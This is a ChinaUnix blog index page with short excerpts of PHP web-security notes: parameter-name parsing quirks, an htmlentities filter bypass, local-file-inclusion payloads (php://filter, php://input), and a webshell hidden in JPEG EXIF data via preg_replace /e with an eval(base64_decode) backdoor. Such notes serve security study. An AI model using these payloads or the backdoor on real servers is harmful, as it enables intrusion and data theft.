Chinaunix首页 | 论坛 | 博客
  • 博客访问: 217365
  • 博文数量: 40
  • 博客积分: 316
  • 博客等级: 二等列兵
  • 技术积分: 840
  • 用 户 组: 普通用户
  • 注册时间: 2012-03-13 12:39
文章分类

全部博文(40)

文章存档

2014年(2)

2013年(28)

2012年(10)

发布时间:2014-03-13 20:20:59

1.    php处理  [  和  %00  eg:    user_id=123     ======    user[id=123   ====== user_id%00jflkajflk=123        这3者对于php来说相等。2.   cookie:  .........【阅读全文】

阅读(2865) | 评论(0) | 转发(0)

发布时间:2013-10-08 13:53:25

exif_read_data()preg_replace() //把webshell隐藏在jepg的exif中,读出来替换。//$exif = exif_read_data('/123.jpg'); preg_replace($exif['Make'],$exif['Model'],'')//preg_replace ("/.*/e", ,"@ eval ( base64_decode("aWYgKGlzc2V0KCRfUE9TVFsienoxIl0pKSB7ZXZhbChzdHJpcHNsYXNoZXMoJF9QT1NUWyJ6ejEiXSkpO30=")).........【阅读全文】

阅读(2728) | 评论(0) | 转发(0)

发布时间:2013-06-08 11:52:27

1.http://xxxxxxx/lfi.php?page=php://filter/read=convert.base64-encode/resource=../config.php2.在allow_url_include = on 且 PHP >= 5.2.0   直接POST php代码并执行   http://xxxxx/lfi.php?page=php://input  post提交的数据:......【阅读全文】

阅读(1579) | 评论(0) | 转发(0)

发布时间:2013-01-31 02:57:50

strip_tags($str)    //去除$str中的html标签。htmlentities($str)   //默认不转换 单引号 , 按照html4.01处理。  ENT_IGNORE,危险选项,导致javacript\x8fscript = javacript     http://kr1.php.net/manual/zh/function.htmlentities.php  &.........【阅读全文】

阅读(1673) | 评论(0) | 转发(0)

发布时间:2013-01-04 01:29:15

short_open_tag     开启该选项,服务器支持 <? ?>。 不开启,只能是<?php ?>。默认为off,改变之后                                需重启web服务器。allow_......【阅读全文】

阅读(1578) | 评论(0) | 转发(0)
给主人留下些什么吧!~~
留言热议
请登录后留言。

登录 注册